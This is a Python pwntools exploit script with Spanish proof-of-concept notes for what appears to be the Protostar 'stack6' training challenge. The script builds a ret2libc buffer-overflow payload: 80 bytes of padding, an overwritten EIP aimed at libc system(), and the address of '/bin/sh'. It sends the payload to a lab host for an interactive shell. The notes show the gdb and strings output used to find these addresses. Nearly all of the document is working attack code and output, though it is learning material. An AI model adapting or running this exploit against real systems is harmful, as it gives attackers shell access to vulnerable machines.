from pwn import *
import time

p = remote('192.168.32.143', 1234)
eip = p32(0xb7ecffb0)
arg = p32(0xb7e97000+1176511)
ebp = "DDDD" #junk data will be in frame pointer
exploit = "" #Overwriting EIP next to \x90*80
exploit += "\x90"*(80-len(ebp))
exploit += ebp #4 bytes
#Building our call system stack!!
exploit += eip #overwriting eip jumping to memory address to libc system
exploit += "AAAA" #ret address after call system where we want to go and getting shell
exploit += arg

time.sleep(2)
p.sendline(exploit)

p.interactive()


'''  --------------------------------------
     |         STACK #call system         |
     |	......                            |
     |	RET #AAAA                         |
     |	0xb7e97000+1176511 (/bin/sh) arg  |
     --------------------------------------

		PoC
0. No podemos realizar un buffer overflow porque tiene proteccion del ret
1. Obtenemos la libreria system:
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>

2. Vemos donde comienza la libc:
(gdb) info proc mappings
process 2306
cmdline = '/tmp/stack6'
cwd = '/tmp'
exe = '/tmp/stack6'
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000          0        /tmp/stack6
	 0x8049000  0x804a000     0x1000          0        /tmp/stack6
	0xb7e96000 0xb7e97000     0x1000          0        
	0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
	0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
	0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
	0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
	0xb7fd9000 0xb7fdc000     0x3000          0        
	0xb7fe0000 0xb7fe2000     0x2000          0        
	0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
	0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
	0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
	0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
	0xbffeb000 0xc0000000    0x15000          0           [stack]

3. Localizamos donde esta /bin/sh para poder pasarle como argumento
user@protostar:/tmp$ strings -t d /lib/libc-2.11.2.so | grep /bin/sh
1176511 /bin/sh

4. Ahora con la lib no hace falta hacer shellcode.
'''
